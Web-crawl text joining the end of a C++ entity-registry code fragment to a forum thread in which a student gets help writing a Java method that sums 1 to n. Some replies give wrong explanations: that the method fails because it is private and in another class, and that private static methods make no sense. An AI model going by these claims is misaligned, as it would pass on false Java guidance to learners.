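    return (id >= 1 && id <= slots.size()) ? slots[id - 1] : nullptr;
  }
};

// "hash" style: the caller supplies arbitrary IDs, typical for clients
// that must mirror IDs assigned elsewhere (e.g. by a server).
class HashRegistry {
  std::unordered_map<std::size_t, iCelEntity*> map;
public:
  void RegisterWithID(std::size_t id, iCelEntity* e) { map[id] = e; }
  iCelEntity* Get(std::size_t id) const {
    auto it = map.find(id);
    return it == map.end() ? nullptr : it->second;
  }
};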
http://crystalspace3d.org/cel/docs/online/api-2.0/structiNumReg.html
CC-MAIN-2014-10
en
refinedweb
I think you're on the right track, since your code in the main method will do what you want it to do. However, your instructions are contradictory: "sumOfN takes an int n as a parameter and returns the sum of N" versus "Your program should loop, ask for n; if n > 0, calculate and print sumOfN". Usually a method will either print something or return it. These instructions are unclear about which they really want (or whether they want both). You could do both, I suppose. Just stuff your main code into the method you have and that would work. Just don't forget to return the value after you print it. As it stands you print out the answer, but the sumOfN method just returns the same number it is given. So it kind of halfway works.

The thing is, I don't know how to write the code for the method to take the user input, calculate, see if it is 0 and then stop the program, or, if the answer is 5, get the sum 5 + 4 + 3 + 2 + 1 + 0. Could you maybe show me some code that would do this? Thanks a bunch.

First off, there is a very quick and very clean way to calculate the sum of N. In your example you used 5, which results in the sum being 1+2+3+4+5=15. This is the hard way of doing things. The fast way (which only works on even numbers, but I'll give a fix for that later) would be:

n = 4; // sumOfN: 1+2+3+4=10
sumOfN = (n/2)*(n+1);

This works because:
1+4 = 5 (n+1)
2+3 = 5 (n+1)
This combination can be made n/2 times.

Now, to make this work with odd numbers as well is very straightforward:

n = 5; // sumOfN: 1+2+3+4+5=15
sumOfN = (((n-1)/2)*n)+n;

This works because:
1+4 = 5 (n)
2+3 = 5 (n)
This combination can be made (n-1)/2 times (twice in this case).

You can check whether an int is odd by doing:

if ((i % 2) == 1) {
}

The % gives you the remainder after dividing by 2, which in the case of an odd number is 1. Now in your case, this calculation would take place in your sumOfN method, which would take the int as a parameter and return the calculated value.

But still, how do I put it into the method sumOfN, calculate it in sumOfN and then pull the result out of sumOfN to be printed? That's what I can't figure out: how to call the method sumOfN, put all the calculations in sumOfN, and print the result.

private static int sumofn(int n) {
    int sum = 0;
    // do the calculating here
    return sum;
}

System.out.println(sumofn(5));

I still keep getting errors that the main cannot read sumofn, and it's not reading the user input. Can anyone find my flaws?

import java.util.*;

public class sumOfN {
    // Method
    private static int sumofn(int n) {
        int count = 0;
        int sum = 0;
        for (count = n; count > 0; count--) {
            sum += count;
            if (n <= 0) {
                System.out.println("Cannot equal 0");
                return sum;
            }
        }
        return sum;
    }

    public static void main(String[] args) {
        Scanner stdin = new Scanner(System.in);
        System.out.println("Please enter an integer: ");
        sumofn = stdin.nextInt();
        System.out.println("SumOfN" + sumofn(n) + " has an integer value of ");
    }
}

I've never done input this way before myself, so I can't help you there. The problem why the main can't read the sumOfN method is that it is private and you have put it in a different class than your main method. If you make it public, that should solve the problem. (This is my fault, I see, because I made it private in my example.) Making a static method private makes no sense though, since a static method is always called from outside the class itself.
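Pulling the thread together, here is a hedged, complete version of the program being built. For what it's worth, the actual compile errors in the posting above are that "sumofn = stdin.nextInt();" assigns to a method name rather than a declared variable, and "n" is never declared in main; the exact wording the assignment wanted printed is an assumption here:

import java.util.Scanner;

public class SumOfN {

    // Returns 1 + 2 + ... + n (0 for n <= 0).
    private static int sumOfN(int n) {
        int sum = 0;
        for (int count = n; count > 0; count--) {
            sum += count;
        }
        return sum;
    }

    public static void main(String[] args) {
        Scanner stdin = new Scanner(System.in);
        while (true) {
            System.out.println("Please enter an integer: ");
            int n = stdin.nextInt();   // declare a variable; don't reuse the method name
            if (n <= 0) {
                break;                 // the loop stops on zero or a negative number
            }
            System.out.println("The sum of N for " + n + " is " + sumOfN(n));
        }
    }
}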
http://forums.devx.com/showthread.php?140642-Help-With-parameter-passing&p=416531
CC-MAIN-2014-10
en
refinedweb